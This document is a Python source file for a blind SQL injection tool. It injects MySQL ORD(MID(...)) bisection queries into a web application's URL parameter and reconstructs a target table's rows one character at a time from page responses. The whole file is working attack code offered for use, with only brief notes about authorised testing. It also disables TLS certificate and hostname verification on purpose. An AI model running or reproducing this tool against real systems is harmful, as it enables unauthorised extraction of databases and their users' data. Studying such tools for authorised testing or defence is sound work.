#!/usr/bin/python
import urllib,urllib2
import sys
import time, ssl
# TLS context handed to urllib2.urlopen by SQLInjector.query for https targets.
ctx = ssl.create_default_context()
# SECURITY: certificate and hostname verification are switched off on purpose
# (presumably to reach targets with self-signed certificates). Consequence:
# every https request is trivially interceptable - the full URL, i.e. the
# injected query, reaches whoever answers on the path, and a forged response
# would be taken as a genuine oracle result. Keep this context for authorised
# testing only and do not reuse it elsewhere. Order matters: ssl refuses
# CERT_NONE while check_hostname is still True, so it is cleared first.
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
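class BlindBuild:
    """Dump rows of a table through a boolean-based blind SQL injection.

    Every character is recovered with a binary search over the byte range
    [0, 256) using MySQL-style ``ORD(MID(...))`` comparisons; the oracle is
    ``sqlInjector.hasReturnedResult`` applied to the page returned for each
    probe query. One probe is issued per bisection step (8 per character).

    Args:
        sqlInjector: object exposing ``query(q)`` and ``hasReturnedResult(res)``
            (see SQLInjector in this file).
        nbFields: number of columns the injected outer SELECT must produce;
            rendered as ``1,1,...,1``.
        database, table: schema and table to read.
        fieldList: column names to extract, in order.
        addWhere: extra WHERE clause for the inner SELECT (default ``'1'``).
        pg: when True, write one ``*`` to stdout per dumped row.

    Note: database, table, fieldList and addWhere are interpolated verbatim
    into the injected SQL. They are operator-supplied by design (this is the
    attack string), so they are deliberately not escaped.
    """

    # Characters are bisected within [0, _MAX_ORD); ORD() of a single-byte
    # character always falls in this range.
    _MAX_ORD = 256

    def __init__(self, sqlInjector, nbFields, database, table, fieldList, addWhere='1', pg=False):
        self.sqlInjector = sqlInjector
        self.__select = ','.join(['1'] * nbFields)
        self.__db = database
        self.__table = table
        self.__fields = fieldList
        self.__addWhere = addWhere
        self.__progress = pg

    def __createResult(self):
        """Return a fresh result line: every requested field mapped to ''."""
        return dict((f, '') for f in self.__fields)

    def __probe(self, field, x, condition):
        """Send one probe and return True when the oracle reports a row.

        The injected statement is
        ``SELECT <1,..,1> FROM (SELECT field FROM db.table WHERE addWhere LIMIT x,1) AS res WHERE condition``
        so the outer SELECT yields a row only when row ``x`` exists and
        ``condition`` holds for it.
        """
        query = 'SELECT %s FROM (SELECT %s FROM %s.%s WHERE %s LIMIT %d,1) AS res WHERE %s' % (
            self.__select, field, self.__db, self.__table, self.__addWhere, x, condition)
        return self.sqlInjector.hasReturnedResult(self.sqlInjector.query(query))

    def __charAt(self, field, x, n):
        """Recover ORD() of character ``n`` (1-based) of ``field`` in row ``x``.

        Returns 0 past the end of the value (ORD of the empty string, which
        the original code already used as the terminator) and None when the
        value cannot be expressed as a single byte: a NULL column or a
        multi-byte character makes every range comparison false, which the
        original mistook for chr(255) and then looped on forever.
        """
        val = 'ORD(MID(res.%s, %d, 1))' % (field, n)
        bmin, bmax = 0, self._MAX_ORD
        # Invariant: the character's ORD() lies in [bmin, bmax).
        while bmax - bmin != 1:
            a = (bmin + bmax) // 2  # '//' keeps this an int on Python 3 as well
            if self.__probe(field, x, '%s>=%d AND %s<%d' % (val, bmin, val, a)):
                bmax = a
            else:
                bmin = a
        # bmin == 255 is reached both for a genuine 0xFF byte and when no
        # comparison ever matched (NULL / out-of-range value). One equality
        # probe disambiguates; it costs a request only in that rare case.
        if bmin == self._MAX_ORD - 1 and not self.__probe(field, x, '%s=%d' % (val, bmin)):
            return None
        return bmin

    def __extractField(self, field, x):
        """Read column ``field`` of row ``x`` character by character."""
        chars = []
        n = 1
        while True:
            c = self.__charAt(field, x, n)
            if c is None or c == 0:
                break
            chars.append(chr(c))
            n += 1
        return ''.join(chars)

    def run(self):
        """Dump every row matching addWhere.

        Returns:
            list of ``{field: value}`` dicts, one per row, in LIMIT order.
            Extraction stops at the first row index for which the existence
            probe returns nothing. With an empty field list nothing can be
            extracted, so an empty list is returned at once (the original
            never terminated in that case).
        """
        dump = []
        if not self.__fields:
            return dump
        x = 0
        # The row-existence probe is issued once per row rather than once per
        # character as before; the per-character probes already fail when the
        # row is missing.
        while self.__probe(self.__fields[0], x, '1'):
            line = self.__createResult()
            for field in self.__fields:
                line[field] = self.__extractField(field, x)
            dump.append(line)
            if self.__progress:
                sys.stdout.write('*')
                sys.stdout.flush()
            x += 1
        if self.__progress:
            sys.stdout.write('\n')
        return dump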
def simpleCallback(v):
    """Default ``callback`` for SQLInjector: hand the injected fragment back unchanged."""
    unchanged = v
    return unchanged
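class SQLInjector:
    """Send one injected SQL fragment per HTTP request and judge the response.

    The request URL is ``urlStart + callback(queryStart + q + queryEnd) + urlEnd``:
    ``queryStart``/``queryEnd`` hold the fixed SQL prefix and suffix of the
    injection point and ``callback`` may transform the whole injected
    fragment before it is placed in the URL (the default leaves it as is).

    Args:
        urlStart, urlEnd: literal URL pieces around the injected fragment.
        queryStart, queryEnd: literal SQL pieces around each query.
        patternCallback: ``f(body) -> bool``; True when the response body
            shows that the injected SELECT produced a row.
        callback: transform applied to the injected fragment.
        cookies: cookies to send with every request, as a list of
            ``'name=value'`` strings or a ``{name: value}`` dict. The
            original stored them but never sent them, and used a shared
            mutable default list.

    Attributes:
        numreq: number of requests issued so far.

    Security notes: over https the module-level ``ctx`` disables certificate
    verification, so the URL (the injected query) and any cookies are exposed
    to on-path hosts and responses could be forged. Use only against targets
    you are authorised to test.
    """

    def __init__(self, urlStart, queryStart, queryEnd, urlEnd, patternCallback, callback=simpleCallback, cookies=None):
        self.__start = urlStart
        self.__queryStart = queryStart
        self.__queryEnd = queryEnd
        self.__end = urlEnd
        # Normalise to a private list of 'name=value' strings; copying avoids
        # the shared-default-list bug of ``cookies=[]``.
        if cookies is None:
            cookies = []
        if isinstance(cookies, dict):
            cookies = ['%s=%s' % kv for kv in cookies.items()]
        self.__cookies = list(cookies)
        self.__CB = callback
        self.__patternCB = patternCallback
        self.numreq = 0

    def _buildUrl(self, q):
        """Return the full request URL carrying SQL fragment ``q``."""
        return self.__start + self.__CB(self.__queryStart + q + self.__queryEnd) + self.__end

    def _headers(self):
        """Return extra request headers: a ``Cookie`` header when cookies were given."""
        if not self.__cookies:
            return {}
        return {'Cookie': '; '.join(self.__cookies)}

    def query(self, q, cheat=False):
        """Issue one request for SQL fragment ``q`` and return the response body.

        ``cheat`` is accepted for compatibility and ignored. Errors raised by
        ``urllib2.urlopen`` (URLError/HTTPError, e.g. a 500 caused by a broken
        query) propagate rather than being read as "no result".
        """
        url = self._buildUrl(q)
        self.numreq += 1
        request = urllib2.Request(url, headers=self._headers())
        # ``ctx`` (module level, unverified TLS) is only relevant for https.
        if url[:5].lower() == 'https':
            response = urllib2.urlopen(request, context=ctx)
        else:
            response = urllib2.urlopen(request)
        try:
            return response.read()
        finally:
            response.close()  # the original never closed the connection

    def hasReturnedResult(self, res):
        """True when ``patternCallback`` recognises a row in response body ``res``."""
        return self.__patternCB(res)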